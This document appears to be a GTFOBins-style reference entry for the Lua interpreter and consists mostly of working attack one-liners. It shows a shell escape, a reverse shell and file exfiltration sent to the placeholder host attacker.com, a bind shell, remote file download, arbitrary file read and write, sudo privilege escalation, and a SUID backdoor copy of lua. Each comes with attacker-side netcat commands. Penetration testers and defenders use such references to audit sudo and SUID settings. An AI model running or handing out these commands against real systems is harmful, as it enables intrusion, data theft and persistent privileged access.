It can be used to break out from restricted environments by spawning an interactive system shell.
lua -e 'os.execute("/bin/sh")'
It can send back a non-interactive reverse shell to a listening attacker to open a remote network access.
Run nc -l -p 12345
on the attacker box to receive the shell. This requires lua-socket
installed.
export RHOST=attacker.com
export RPORT=12345
lua -e 'local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
while true do
local r,x=t:receive();local f=assert(io.popen(r,"r"));
local b=assert(f:read("*a"));t:send(b);
end;
f:close();t:close();'
It can bind a non-interactive shell to a local port to allow remote network access.
Run nc target.com 12345
on the attacker box to connect to the shell. This requires lua-socket
installed.
export LPORT=12345
lua -e 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
while true do
local r,x=c:receive();local f=assert(io.popen(r,"r"));
local b=assert(f:read("*a"));c:send(b);
end;c:close();f:close();'
It can exfiltrate files on the network.
Send a file to a TCP port. Run nc -l -p 12345 > "file_to_save"
on the attacker box to collect the file. This requires lua-socket
installed.
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
lua -e '
local f=io.open(os.getenv("LFILE"), 'rb')
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'
It can download remote files.
Fetch remote file sent to a local TCP port. Run nc target.com 12345 < "file_to_send"
on the attacker box to send the file. This requires lua-socket
installed.
export LPORT=12345
export LFILE=file_to_save
lua -e 'local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'
It writes data to files, it may be used to do privileged writes or write files outside a restricted file system.
lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
It runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on sudo
.
sudo lua -e 'os.execute("/bin/sh")'
It runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run commands it only works on systems
like Debian that allow the default sh
shell to run with SUID privileges.
sudo sh -c 'cp $(which lua) .; chmod +s ./lua'
./lua -e 'os.execute("/bin/sh")'